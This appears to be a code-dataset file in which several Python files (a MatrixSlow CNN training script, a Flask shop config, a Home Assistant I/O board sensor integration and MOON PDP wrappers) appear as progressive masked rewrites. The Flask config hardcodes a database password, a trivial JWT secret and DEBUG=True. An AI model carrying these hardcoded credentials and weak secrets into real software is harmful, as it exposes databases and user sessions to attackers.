one_hot)\nlearning_rate = 0.005\noptimizer = ms.optimizer.Adam(ms.default_graph, loss, learning_rate)\nbatch_size = 32\nfor epoch in range(60):\n batch_count = 0\n for i in range(len(X)):\n feature = np.mat(X.values[i]).reshape(img_shape)\n label = np.mat(one_hot_label[i]).T\n x.set_value(feature)\n one_hot.set_value(label)\n optimizer.one_step()\n batch_count += 1\n if batch_count >= batch_size:\n print('epoch: {:d}, iteration: {:d}, loss: {:.3f}'.format(epoch +\n 1, i + 1, loss.value[0, 0]))\n optimizer.update()\n batch_count = 0\n pred = []\n for i in range(len(X)):\n feature = np.mat(X[i]).reshape(img_shape)\n x.set_value(feature)\n predict.forward()\n pred.append(predict.value.A.ravel())\n pred = np.array(pred).argmax(axis=1)\n accuracy = (y == pred).astype(np.int).sum() / len(X)\n print('epoch: {:d}, accuracy: {:.3f}'.format(epoch + 1, accuracy))\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 24 12:16:15 2020\n\n@author: zhangjuefei\n\"\"\"\n\nimport sys\nsys.path.append('../..')\n\nimport numpy as np\nfrom sklearn.datasets import fetch_openml\nfrom sklearn.preprocessing import OneHotEncoder\nimport matrixslow as ms\n\n# 加载MNIST数据集,取一部分样本并归一化\nX, y = fetch_openml('mnist_784', version=1, return_X_y=True)\nX, y = X[:1000] / 255, y.astype(np.int)[:1000]\n\n# 将整数形式的标签转换成One-Hot编码\noh = OneHotEncoder(sparse=False)\none_hot_label = oh.fit_transform(y.values.reshape(-1, 1))\n\n# 输入图像尺寸\nimg_shape = (28, 28)\n\n# 输入图像\nx = ms.core.Variable(img_shape, init=False, trainable=False)\n\n# One-Hot标签\none_hot = ms.core.Variable(dim=(10, 1), init=False, trainable=False)\n\n# 第一卷积层\nconv1 = ms.layer.conv([x], img_shape, 3, (5, 5), \"ReLU\")\n\n# 第一池化层\npooling1 = ms.layer.pooling(conv1, (3, 3), (2, 2))\n\n# 第二卷积层\nconv2 = ms.layer.conv(pooling1, (14, 14), 3, (3, 3), \"ReLU\")\n\n# 第二池化层\npooling2 = ms.layer.pooling(conv2, (3, 3), (2, 2))\n\n# 全连接层\nfc1 = ms.layer.fc(ms.ops.Concat(*pooling2), 147, 120, \"ReLU\")\n\n# 输出层\noutput = ms.layer.fc(fc1, 120, 10, \"None\")\n\n# 分类概率\npredict = ms.ops.SoftMax(output)\n\n# 交叉熵损失\nloss = ms.ops.loss.CrossEntropyWithSoftMax(output, one_hot)\n\n# 学习率\nlearning_rate = 0.005\n\n# 优化器\noptimizer = ms.optimizer.Adam(ms.default_graph, loss, learning_rate)\n\n# 批大小\nbatch_size = 32\n\n# 训练\nfor epoch in range(60):\n \n batch_count = 0\n \n for i in range(len(X)):\n \n feature = np.mat(X.values[i]).reshape(img_shape)\n label = np.mat(one_hot_label[i]).T\n \n x.set_value(feature)\n one_hot.set_value(label)\n \n\n optimizer.one_step()\n \n\n batch_count += 1\n if batch_count >= batch_size:\n \n print(\"epoch: {:d}, iteration: {:d}, loss: {:.3f}\".format(epoch + 1, i + 1, loss.value[0, 0]))\n\n optimizer.update()\n batch_count = 0\n \n\n pred = []\n for i in range(len(X)):\n \n feature = np.mat(X[i]).reshape(img_shape)\n x.set_value(feature)\n \n predict.forward()\n pred.append(predict.value.A.ravel())\n \n pred = np.array(pred).argmax(axis=1)\n accuracy = (y == pred).astype(np.int).sum() / len(X)\n \n print(\"epoch: {:d}, accuracy: {:.3f}\".format(epoch + 1, accuracy))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
ROOT_PATH = os.path.split(os.path.abspath(__name__))[0]
DEBUG = True
JWT_SECRET_KEY = 'shop'
SQLALCHEMY_TRACK_MODIFICATIONS = False
user = 'shop'
passwd = 'shopadmin'
db = 'shopdb'
SQLALCHEMY_DATABASE_URI = (
f'mysql+pymysql://{user}:{passwd}@10.10.10.105:6606/{db}')
JWT_AUTH_USERNAME_KEY = 'username'
JWT_AUTH_PASSWORD_KEY = 'password'
JWT_AUTH_HEADER_PREFIX = 'JWT'
JWT_EXPIRATION_DELTA = timedelta(days=30)
JWT_ALGORITHM = 'HS256'
JWT_REQUIRED_CLAIMS = ['exp', 'iat', 'nbf']
UPLOADED_PHOTOS_DEST = os.path.join(ROOT_PATH, 'uploads/')
<|reserved_special_token_1|>
import os
from datetime import timedelta
ROOT_PATH = os.path.split(os.path.abspath(__name__))[0]
DEBUG = True
JWT_SECRET_KEY = 'shop'
SQLALCHEMY_TRACK_MODIFICATIONS = False
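# MySQL connection settings; the SQLAlchemy URI below follows the
# dialect+driver://user:password@host:port/database scheme.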
user = 'shop'
passwd = 'shopadmin'
db = 'shopdb'
SQLALCHEMY_DATABASE_URI = (
f'mysql+pymysql://{user}:{passwd}@10.10.10.105:6606/{db}')
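# Flask-JWT settings: credential field names, the Authorization header
# prefix ("JWT <token>"), token lifetime and signing algorithm.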
JWT_AUTH_USERNAME_KEY = 'username'
JWT_AUTH_PASSWORD_KEY = 'password'
JWT_AUTH_HEADER_PREFIX = 'JWT'
JWT_EXPIRATION_DELTA = timedelta(days=30)
JWT_ALGORITHM = 'HS256'
JWT_REQUIRED_CLAIMS = ['exp', 'iat', 'nbf']
UPLOADED_PHOTOS_DEST = os.path.join(ROOT_PATH, 'uploads/')
<|reserved_special_token_1|>
import os
from datetime import timedelta
ROOT_PATH = os.path.split(os.path.abspath(__name__))[0]
DEBUG = True
JWT_SECRET_KEY = 'shop'
# SQLALCHEMY_DATABASE_URI = 'sqlite:///{}'.format(
# os.path.join(ROOT_PATH, 's_shop_flask.db'))
SQLALCHEMY_TRACK_MODIFICATIONS = False
user = 'shop'
passwd = 'shopadmin'
db = 'shopdb'
SQLALCHEMY_DATABASE_URI = f'mysql+pymysql://{user}:{passwd}@10.10.10.105:6606/{db}'
JWT_AUTH_USERNAME_KEY = 'username'
JWT_AUTH_PASSWORD_KEY = 'password'
JWT_AUTH_HEADER_PREFIX = 'JWT'
JWT_EXPIRATION_DELTA = timedelta(days=30)
JWT_ALGORITHM = 'HS256'
JWT_REQUIRED_CLAIMS = ['exp', 'iat', 'nbf']
# Image upload path
UPLOADED_PHOTOS_DEST = os.path.join(ROOT_PATH, 'uploads/')
|
flexible
|
{
"blob_id": "3908d303d0e41677aae332fbdbe9b681bffe5391",
"index": 1044,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nROOT_PATH = os.path.split(os.path.abspath(__name__))[0]\nDEBUG = True\nJWT_SECRET_KEY = 'shop'\nSQLALCHEMY_TRACK_MODIFICATIONS = False\nuser = 'shop'\npasswd = 'shopadmin'\ndb = 'shopdb'\nSQLALCHEMY_DATABASE_URI = (\n f'mysql+pymysql://{user}:{passwd}@10.10.10.105:6606/{db}')\nJWT_AUTH_USERNAME_KEY = 'username'\nJWT_AUTH_PASSWORD_KEY = 'password'\nJWT_AUTH_HEADER_PREFIX = 'JWT'\nJWT_EXPIRATION_DELTA = timedelta(days=30)\nJWT_ALGORITHM = 'HS256'\nJWT_REQUIRED_CLAIMS = ['exp', 'iat', 'nbf']\nUPLOADED_PHOTOS_DEST = os.path.join(ROOT_PATH, 'uploads/')\n",
"step-3": "import os\nfrom datetime import timedelta\nROOT_PATH = os.path.split(os.path.abspath(__name__))[0]\nDEBUG = True\nJWT_SECRET_KEY = 'shop'\nSQLALCHEMY_TRACK_MODIFICATIONS = False\nuser = 'shop'\npasswd = 'shopadmin'\ndb = 'shopdb'\nSQLALCHEMY_DATABASE_URI = (\n f'mysql+pymysql://{user}:{passwd}@10.10.10.105:6606/{db}')\nJWT_AUTH_USERNAME_KEY = 'username'\nJWT_AUTH_PASSWORD_KEY = 'password'\nJWT_AUTH_HEADER_PREFIX = 'JWT'\nJWT_EXPIRATION_DELTA = timedelta(days=30)\nJWT_ALGORITHM = 'HS256'\nJWT_REQUIRED_CLAIMS = ['exp', 'iat', 'nbf']\nUPLOADED_PHOTOS_DEST = os.path.join(ROOT_PATH, 'uploads/')\n",
"step-4": "import os\nfrom datetime import timedelta\n\nROOT_PATH = os.path.split(os.path.abspath(__name__))[0]\n\nDEBUG = True\nJWT_SECRET_KEY = 'shop'\n# SQLALCHEMY_DATABASE_URI = 'sqlite:///{}'.format(\n# os.path.join(ROOT_PATH, 's_shop_flask.db'))\nSQLALCHEMY_TRACK_MODIFICATIONS = False\nuser = 'shop'\npasswd = 'shopadmin'\ndb = 'shopdb'\n\nSQLALCHEMY_DATABASE_URI = f'mysql+pymysql://{user}:{passwd}@10.10.10.105:6606/{db}'\n\nJWT_AUTH_USERNAME_KEY = 'username'\nJWT_AUTH_PASSWORD_KEY = 'password'\nJWT_AUTH_HEADER_PREFIX = 'JWT'\nJWT_EXPIRATION_DELTA = timedelta(days=30)\nJWT_ALGORITHM = 'HS256'\nJWT_REQUIRED_CLAIMS = ['exp', 'iat', 'nbf']\n\n# 图片上传路径\nUPLOADED_PHOTOS_DEST = os.path.join(ROOT_PATH, 'uploads/')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class abelectronicsiopiBinarySensor(BinarySensorEntity):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, pinname, pin, pull_mode, invert_logic, bus):
"""Initialize the pin."""
self._state = None
self._name = pinname
self.targetpin = pin
self.iobus = bus
if pull_mode == True:
self.iobus.set_pin_pullup(self.targetpin, 1)
else:
self.iobus.set_pin_pullup(self.targetpin, 0)
self.iobus.set_pin_direction(self.targetpin, 1)
if invert_logic == True:
self.iobus.invert_pin(self.targetpin, 1)
else:
self.iobus.invert_pin(self.targetpin, 0)
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def is_on(self):
"""Return the state of the entity."""
self._state = self.iobus.read_pin(self.targetpin)
return self._state
def update(self):
"""Update the GPIO state."""
self._state = self.iobus.read_pin(self.targetpin)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class abelectronicsiopiBinarySensor(BinarySensorEntity):
"""Represent a binary sensor that uses abelectronicsiopi."""
iobus = None
targetpin = None
_state = False
def __init__(self, pinname, pin, pull_mode, invert_logic, bus):
"""Initialize the pin."""
self._state = None
self._name = pinname
self.targetpin = pin
self.iobus = bus
if pull_mode == True:
self.iobus.set_pin_pullup(self.targetpin, 1)
else:
self.iobus.set_pin_pullup(self.targetpin, 0)
self.iobus.set_pin_direction(self.targetpin, 1)
if invert_logic == True:
self.iobus.invert_pin(self.targetpin, 1)
else:
self.iobus.invert_pin(self.targetpin, 0)
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def is_on(self):
"""Return the state of the entity."""
self._state = self.iobus.read_pin(self.targetpin)
return self._state
def update(self):
"""Update the GPIO state."""
self._state = self.iobus.read_pin(self.targetpin)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the abelectronicsiopi binary sensors."""
pull_mode = config[CONF_PULL_MODE]
invert_logic = config[CONF_INVERT_LOGIC]
iopi = IOPi(config.get(CONF_I2C_ADDRESS), True)
binary_sensors = []
pins = config[CONF_PINS]
for pin_num, pin_name in pins.items():
binary_sensors.append(abelectronicsiopiBinarySensor(pin_name,
pin_num, pull_mode, invert_logic, iopi))
add_devices(binary_sensors, True)
class abelectronicsiopiBinarySensor(BinarySensorEntity):
"""Represent a binary sensor that uses abelectronicsiopi."""
iobus = None
targetpin = None
_state = False
def __init__(self, pinname, pin, pull_mode, invert_logic, bus):
"""Initialize the pin."""
self._state = None
self._name = pinname
self.targetpin = pin
self.iobus = bus
if pull_mode == True:
self.iobus.set_pin_pullup(self.targetpin, 1)
else:
self.iobus.set_pin_pullup(self.targetpin, 0)
self.iobus.set_pin_direction(self.targetpin, 1)
if invert_logic == True:
self.iobus.invert_pin(self.targetpin, 1)
else:
self.iobus.invert_pin(self.targetpin, 0)
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def is_on(self):
"""Return the state of the entity."""
self._state = self.iobus.read_pin(self.targetpin)
return self._state
def update(self):
"""Update the GPIO state."""
self._state = self.iobus.read_pin(self.targetpin)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from custom_components.abelectronicsiopi.IOPi import IOPi
import voluptuous as vol
from homeassistant.components.binary_sensor import PLATFORM_SCHEMA, BinarySensorEntity
from homeassistant.const import DEVICE_DEFAULT_NAME
import homeassistant.helpers.config_validation as cv
CONF_INVERT_LOGIC = 'invert_logic'
CONF_I2C_ADDRESS = 'i2c_address'
CONF_PINS = 'pins'
CONF_PULL_MODE = 'pull_mode'
DEFAULT_INVERT_LOGIC = False
DEFAULT_I2C_ADDRESS = 32
DEFAULT_PULL_MODE = True
_SENSORS_SCHEMA = vol.Schema({cv.positive_int: cv.string})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({vol.Required(CONF_PINS):
_SENSORS_SCHEMA, vol.Optional(CONF_INVERT_LOGIC, default=
DEFAULT_INVERT_LOGIC): cv.boolean, vol.Optional(CONF_PULL_MODE, default
=DEFAULT_PULL_MODE): cv.boolean, vol.Optional(CONF_I2C_ADDRESS, default
=DEFAULT_I2C_ADDRESS): vol.Coerce(int)})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the abelectronicsiopi binary sensors."""
pull_mode = config[CONF_PULL_MODE]
invert_logic = config[CONF_INVERT_LOGIC]
iopi = IOPi(config.get(CONF_I2C_ADDRESS), True)
binary_sensors = []
pins = config[CONF_PINS]
for pin_num, pin_name in pins.items():
binary_sensors.append(abelectronicsiopiBinarySensor(pin_name,
pin_num, pull_mode, invert_logic, iopi))
add_devices(binary_sensors, True)
class abelectronicsiopiBinarySensor(BinarySensorEntity):
"""Represent a binary sensor that uses abelectronicsiopi."""
iobus = None
targetpin = None
_state = False
def __init__(self, pinname, pin, pull_mode, invert_logic, bus):
"""Initialize the pin."""
self._state = None
self._name = pinname
self.targetpin = pin
self.iobus = bus
if pull_mode == True:
self.iobus.set_pin_pullup(self.targetpin, 1)
else:
self.iobus.set_pin_pullup(self.targetpin, 0)
self.iobus.set_pin_direction(self.targetpin, 1)
if invert_logic == True:
self.iobus.invert_pin(self.targetpin, 1)
else:
self.iobus.invert_pin(self.targetpin, 0)
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def is_on(self):
"""Return the state of the entity."""
self._state = self.iobus.read_pin(self.targetpin)
return self._state
def update(self):
"""Update the GPIO state."""
self._state = self.iobus.read_pin(self.targetpin)
<|reserved_special_token_1|>
"""Support for binary sensor using I2C abelectronicsiopi chip."""
from custom_components.abelectronicsiopi.IOPi import IOPi
import voluptuous as vol
from homeassistant.components.binary_sensor import PLATFORM_SCHEMA, BinarySensorEntity
from homeassistant.const import DEVICE_DEFAULT_NAME
import homeassistant.helpers.config_validation as cv
CONF_INVERT_LOGIC = "invert_logic"
CONF_I2C_ADDRESS = "i2c_address"
CONF_PINS = "pins"
CONF_PULL_MODE = "pull_mode"
DEFAULT_INVERT_LOGIC = False
DEFAULT_I2C_ADDRESS = 0x20
DEFAULT_PULL_MODE = True
_SENSORS_SCHEMA = vol.Schema({cv.positive_int: cv.string})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_PINS): _SENSORS_SCHEMA,
vol.Optional(CONF_INVERT_LOGIC, default=DEFAULT_INVERT_LOGIC): cv.boolean,
vol.Optional(CONF_PULL_MODE, default=DEFAULT_PULL_MODE): cv.boolean,
vol.Optional(CONF_I2C_ADDRESS, default=DEFAULT_I2C_ADDRESS): vol.Coerce(int),
}
)
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the abelectronicsiopi binary sensors."""
pull_mode = config[CONF_PULL_MODE]
invert_logic = config[CONF_INVERT_LOGIC]
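    # The second IOPi() argument asks the ABElectronics library to initialise
    # the chip's registers on creation (assumed from the bundled IOPi API).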
iopi = IOPi(config.get(CONF_I2C_ADDRESS), True)
binary_sensors = []
pins = config[CONF_PINS]
for pin_num, pin_name in pins.items():
binary_sensors.append(abelectronicsiopiBinarySensor(pin_name, pin_num, pull_mode, invert_logic, iopi))
add_devices(binary_sensors, True)
class abelectronicsiopiBinarySensor(BinarySensorEntity):
"""Represent a binary sensor that uses abelectronicsiopi."""
iobus = None
targetpin = None
_state = False
def __init__(self, pinname, pin, pull_mode, invert_logic, bus):
"""Initialize the pin."""
self._state = None
self._name = pinname
self.targetpin = pin
self.iobus = bus
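        # Configure the pin as an input (direction = 1), with an optional
        # internal pull-up and optional logic inversion per the config options.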
if pull_mode == True:
self.iobus.set_pin_pullup(self.targetpin, 1)
else:
self.iobus.set_pin_pullup(self.targetpin, 0)
self.iobus.set_pin_direction(self.targetpin, 1)
if invert_logic == True:
self.iobus.invert_pin(self.targetpin, 1)
else:
self.iobus.invert_pin(self.targetpin, 0)
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def is_on(self):
"""Return the state of the entity."""
self._state = self.iobus.read_pin(self.targetpin)
return self._state
def update(self):
"""Update the GPIO state."""
self._state = self.iobus.read_pin(self.targetpin)
|
flexible
|
{
"blob_id": "73d056d4ab0d268841156b21dfc2c54b5fb2f5f1",
"index": 5218,
"step-1": "<mask token>\n\n\nclass abelectronicsiopiBinarySensor(BinarySensorEntity):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, pinname, pin, pull_mode, invert_logic, bus):\n \"\"\"Initialize the pin.\"\"\"\n self._state = None\n self._name = pinname\n self.targetpin = pin\n self.iobus = bus\n if pull_mode == True:\n self.iobus.set_pin_pullup(self.targetpin, 1)\n else:\n self.iobus.set_pin_pullup(self.targetpin, 0)\n self.iobus.set_pin_direction(self.targetpin, 1)\n if invert_logic == True:\n self.iobus.invert_pin(self.targetpin, 1)\n else:\n self.iobus.invert_pin(self.targetpin, 0)\n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return self._name\n\n @property\n def is_on(self):\n \"\"\"Return the state of the entity.\"\"\"\n self._state = self.iobus.read_pin(self.targetpin)\n return self._state\n\n def update(self):\n \"\"\"Update the GPIO state.\"\"\"\n self._state = self.iobus.read_pin(self.targetpin)\n",
"step-2": "<mask token>\n\n\nclass abelectronicsiopiBinarySensor(BinarySensorEntity):\n \"\"\"Represent a binary sensor that uses abelectronicsiopi.\"\"\"\n iobus = None\n targetpin = None\n _state = False\n\n def __init__(self, pinname, pin, pull_mode, invert_logic, bus):\n \"\"\"Initialize the pin.\"\"\"\n self._state = None\n self._name = pinname\n self.targetpin = pin\n self.iobus = bus\n if pull_mode == True:\n self.iobus.set_pin_pullup(self.targetpin, 1)\n else:\n self.iobus.set_pin_pullup(self.targetpin, 0)\n self.iobus.set_pin_direction(self.targetpin, 1)\n if invert_logic == True:\n self.iobus.invert_pin(self.targetpin, 1)\n else:\n self.iobus.invert_pin(self.targetpin, 0)\n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return self._name\n\n @property\n def is_on(self):\n \"\"\"Return the state of the entity.\"\"\"\n self._state = self.iobus.read_pin(self.targetpin)\n return self._state\n\n def update(self):\n \"\"\"Update the GPIO state.\"\"\"\n self._state = self.iobus.read_pin(self.targetpin)\n",
"step-3": "<mask token>\n\n\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n \"\"\"Set up the abelectronicsiopi binary sensors.\"\"\"\n pull_mode = config[CONF_PULL_MODE]\n invert_logic = config[CONF_INVERT_LOGIC]\n iopi = IOPi(config.get(CONF_I2C_ADDRESS), True)\n binary_sensors = []\n pins = config[CONF_PINS]\n for pin_num, pin_name in pins.items():\n binary_sensors.append(abelectronicsiopiBinarySensor(pin_name,\n pin_num, pull_mode, invert_logic, iopi))\n add_devices(binary_sensors, True)\n\n\nclass abelectronicsiopiBinarySensor(BinarySensorEntity):\n \"\"\"Represent a binary sensor that uses abelectronicsiopi.\"\"\"\n iobus = None\n targetpin = None\n _state = False\n\n def __init__(self, pinname, pin, pull_mode, invert_logic, bus):\n \"\"\"Initialize the pin.\"\"\"\n self._state = None\n self._name = pinname\n self.targetpin = pin\n self.iobus = bus\n if pull_mode == True:\n self.iobus.set_pin_pullup(self.targetpin, 1)\n else:\n self.iobus.set_pin_pullup(self.targetpin, 0)\n self.iobus.set_pin_direction(self.targetpin, 1)\n if invert_logic == True:\n self.iobus.invert_pin(self.targetpin, 1)\n else:\n self.iobus.invert_pin(self.targetpin, 0)\n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return self._name\n\n @property\n def is_on(self):\n \"\"\"Return the state of the entity.\"\"\"\n self._state = self.iobus.read_pin(self.targetpin)\n return self._state\n\n def update(self):\n \"\"\"Update the GPIO state.\"\"\"\n self._state = self.iobus.read_pin(self.targetpin)\n",
"step-4": "<mask token>\nfrom custom_components.abelectronicsiopi.IOPi import IOPi\nimport voluptuous as vol\nfrom homeassistant.components.binary_sensor import PLATFORM_SCHEMA, BinarySensorEntity\nfrom homeassistant.const import DEVICE_DEFAULT_NAME\nimport homeassistant.helpers.config_validation as cv\nCONF_INVERT_LOGIC = 'invert_logic'\nCONF_I2C_ADDRESS = 'i2c_address'\nCONF_PINS = 'pins'\nCONF_PULL_MODE = 'pull_mode'\nDEFAULT_INVERT_LOGIC = False\nDEFAULT_I2C_ADDRESS = 32\nDEFAULT_PULL_MODE = True\n_SENSORS_SCHEMA = vol.Schema({cv.positive_int: cv.string})\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({vol.Required(CONF_PINS):\n _SENSORS_SCHEMA, vol.Optional(CONF_INVERT_LOGIC, default=\n DEFAULT_INVERT_LOGIC): cv.boolean, vol.Optional(CONF_PULL_MODE, default\n =DEFAULT_PULL_MODE): cv.boolean, vol.Optional(CONF_I2C_ADDRESS, default\n =DEFAULT_I2C_ADDRESS): vol.Coerce(int)})\n\n\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n \"\"\"Set up the abelectronicsiopi binary sensors.\"\"\"\n pull_mode = config[CONF_PULL_MODE]\n invert_logic = config[CONF_INVERT_LOGIC]\n iopi = IOPi(config.get(CONF_I2C_ADDRESS), True)\n binary_sensors = []\n pins = config[CONF_PINS]\n for pin_num, pin_name in pins.items():\n binary_sensors.append(abelectronicsiopiBinarySensor(pin_name,\n pin_num, pull_mode, invert_logic, iopi))\n add_devices(binary_sensors, True)\n\n\nclass abelectronicsiopiBinarySensor(BinarySensorEntity):\n \"\"\"Represent a binary sensor that uses abelectronicsiopi.\"\"\"\n iobus = None\n targetpin = None\n _state = False\n\n def __init__(self, pinname, pin, pull_mode, invert_logic, bus):\n \"\"\"Initialize the pin.\"\"\"\n self._state = None\n self._name = pinname\n self.targetpin = pin\n self.iobus = bus\n if pull_mode == True:\n self.iobus.set_pin_pullup(self.targetpin, 1)\n else:\n self.iobus.set_pin_pullup(self.targetpin, 0)\n self.iobus.set_pin_direction(self.targetpin, 1)\n if invert_logic == True:\n self.iobus.invert_pin(self.targetpin, 1)\n else:\n self.iobus.invert_pin(self.targetpin, 0)\n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return self._name\n\n @property\n def is_on(self):\n \"\"\"Return the state of the entity.\"\"\"\n self._state = self.iobus.read_pin(self.targetpin)\n return self._state\n\n def update(self):\n \"\"\"Update the GPIO state.\"\"\"\n self._state = self.iobus.read_pin(self.targetpin)\n",
"step-5": "\"\"\"Support for binary sensor using I2C abelectronicsiopi chip.\"\"\"\r\nfrom custom_components.abelectronicsiopi.IOPi import IOPi\r\nimport voluptuous as vol\r\n\r\nfrom homeassistant.components.binary_sensor import PLATFORM_SCHEMA, BinarySensorEntity\r\nfrom homeassistant.const import DEVICE_DEFAULT_NAME\r\nimport homeassistant.helpers.config_validation as cv\r\n\r\nCONF_INVERT_LOGIC = \"invert_logic\"\r\nCONF_I2C_ADDRESS = \"i2c_address\"\r\nCONF_PINS = \"pins\"\r\nCONF_PULL_MODE = \"pull_mode\"\r\n\r\nDEFAULT_INVERT_LOGIC = False\r\nDEFAULT_I2C_ADDRESS = 0x20\r\nDEFAULT_PULL_MODE = True\r\n\r\n_SENSORS_SCHEMA = vol.Schema({cv.positive_int: cv.string})\r\n\r\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(\r\n {\r\n vol.Required(CONF_PINS): _SENSORS_SCHEMA,\r\n vol.Optional(CONF_INVERT_LOGIC, default=DEFAULT_INVERT_LOGIC): cv.boolean,\r\n vol.Optional(CONF_PULL_MODE, default=DEFAULT_PULL_MODE): cv.boolean,\r\n vol.Optional(CONF_I2C_ADDRESS, default=DEFAULT_I2C_ADDRESS): vol.Coerce(int),\r\n }\r\n)\r\n\r\n\r\ndef setup_platform(hass, config, add_devices, discovery_info=None):\r\n \"\"\"Set up the abelectronicsiopi binary sensors.\"\"\"\r\n pull_mode = config[CONF_PULL_MODE]\r\n invert_logic = config[CONF_INVERT_LOGIC]\r\n\r\n iopi = IOPi(config.get(CONF_I2C_ADDRESS), True)\r\n\r\n binary_sensors = []\r\n pins = config[CONF_PINS]\r\n\r\n for pin_num, pin_name in pins.items():\r\n binary_sensors.append(abelectronicsiopiBinarySensor(pin_name, pin_num, pull_mode, invert_logic, iopi))\r\n add_devices(binary_sensors, True)\r\n\r\n\r\nclass abelectronicsiopiBinarySensor(BinarySensorEntity):\r\n \"\"\"Represent a binary sensor that uses abelectronicsiopi.\"\"\"\r\n\r\n iobus = None\r\n targetpin = None\r\n _state = False\r\n\r\n def __init__(self, pinname, pin, pull_mode, invert_logic, bus):\r\n \"\"\"Initialize the pin.\"\"\"\r\n self._state = None\r\n self._name = pinname\r\n self.targetpin = pin\r\n self.iobus = bus\r\n\r\n if pull_mode == True:\r\n self.iobus.set_pin_pullup(self.targetpin, 1)\r\n else:\r\n self.iobus.set_pin_pullup(self.targetpin, 0)\r\n\r\n self.iobus.set_pin_direction(self.targetpin, 1)\r\n\r\n if invert_logic == True:\r\n self.iobus.invert_pin(self.targetpin, 1)\r\n else:\r\n self.iobus.invert_pin(self.targetpin, 0) \r\n\r\n @property\r\n def name(self):\r\n \"\"\"Return the name of the sensor.\"\"\"\r\n return self._name\r\n\r\n @property\r\n def is_on(self):\r\n \"\"\"Return the state of the entity.\"\"\"\r\n self._state = self.iobus.read_pin(self.targetpin)\r\n return self._state\r\n\r\n def update(self):\r\n \"\"\"Update the GPIO state.\"\"\"\r\n self._state = self.iobus.read_pin(self.targetpin)\r\n",
"step-ids": [
5,
7,
8,
10,
11
]
}
|
[
5,
7,
8,
10,
11
] |
<|reserved_special_token_0|>
def delete_pdp(pdp_id):
from moon_manager.db_driver import PDPManager
PDPManager.delete_pdp('', pdp_id)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def delete_pdp(pdp_id):
from moon_manager.db_driver import PDPManager
PDPManager.delete_pdp('', pdp_id)
def add_pdp(pdp_id=None, value=None):
from moon_manager.db_driver import PDPManager
return PDPManager.add_pdp('', pdp_id, value)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def delete_pdp(pdp_id):
from moon_manager.db_driver import PDPManager
PDPManager.delete_pdp('', pdp_id)
def add_pdp(pdp_id=None, value=None):
from moon_manager.db_driver import PDPManager
return PDPManager.add_pdp('', pdp_id, value)
def get_pdp(pdp_id=None):
from moon_manager.db_driver import PDPManager
return PDPManager.get_pdp('', pdp_id)
<|reserved_special_token_1|>
def update_pdp(pdp_id, value):
from moon_manager.db_driver import PDPManager
return PDPManager.update_pdp('', pdp_id, value)
def delete_pdp(pdp_id):
from moon_manager.db_driver import PDPManager
PDPManager.delete_pdp('', pdp_id)
def add_pdp(pdp_id=None, value=None):
from moon_manager.db_driver import PDPManager
return PDPManager.add_pdp('', pdp_id, value)
def get_pdp(pdp_id=None):
from moon_manager.db_driver import PDPManager
return PDPManager.get_pdp('', pdp_id)
<|reserved_special_token_1|>
# Software Name: MOON

# Version: 5.4

# SPDX-FileCopyrightText: Copyright (c) 2018-2020 Orange and its contributors
# SPDX-License-Identifier: Apache-2.0

# This software is distributed under the 'Apache License 2.0',
# the text of which is available at 'http://www.apache.org/licenses/LICENSE-2.0.txt'
# or see the "LICENSE" file for more details.


def update_pdp(pdp_id, value):
    from moon_manager.db_driver import PDPManager
    return PDPManager.update_pdp("", pdp_id, value)


def delete_pdp(pdp_id):
    from moon_manager.db_driver import PDPManager
    PDPManager.delete_pdp("", pdp_id)


def add_pdp(pdp_id=None, value=None):
    from moon_manager.db_driver import PDPManager
    return PDPManager.add_pdp("", pdp_id, value)


def get_pdp(pdp_id=None):
    from moon_manager.db_driver import PDPManager
    return PDPManager.get_pdp("", pdp_id)
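A short usage sketch for these wrappers; it assumes a moon_manager database driver is configured, and the payload fields plus the shape of add_pdp's return value are illustrative guesses rather than documented behavior:

# Hypothetical round trip through the PDP helpers.
new_pdp = add_pdp(value={"name": "demo_pdp", "description": "example"})

# Assumption: the manager returns the created record keyed by its id.
pdp_id = next(iter(new_pdp))

print(get_pdp(pdp_id))                        # read the record back
update_pdp(pdp_id, {"name": "demo_pdp_v2"})   # rename it
delete_pdp(pdp_id)                            # clean up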
|
flexible
|
{
"blob_id": "af35075eaca9bba3d6bdb73353eaf944869cdede",
"index": 799,
"step-1": "<mask token>\n\n\ndef delete_pdp(pdp_id):\n from moon_manager.db_driver import PDPManager\n PDPManager.delete_pdp('', pdp_id)\n\n\n<mask token>\n",
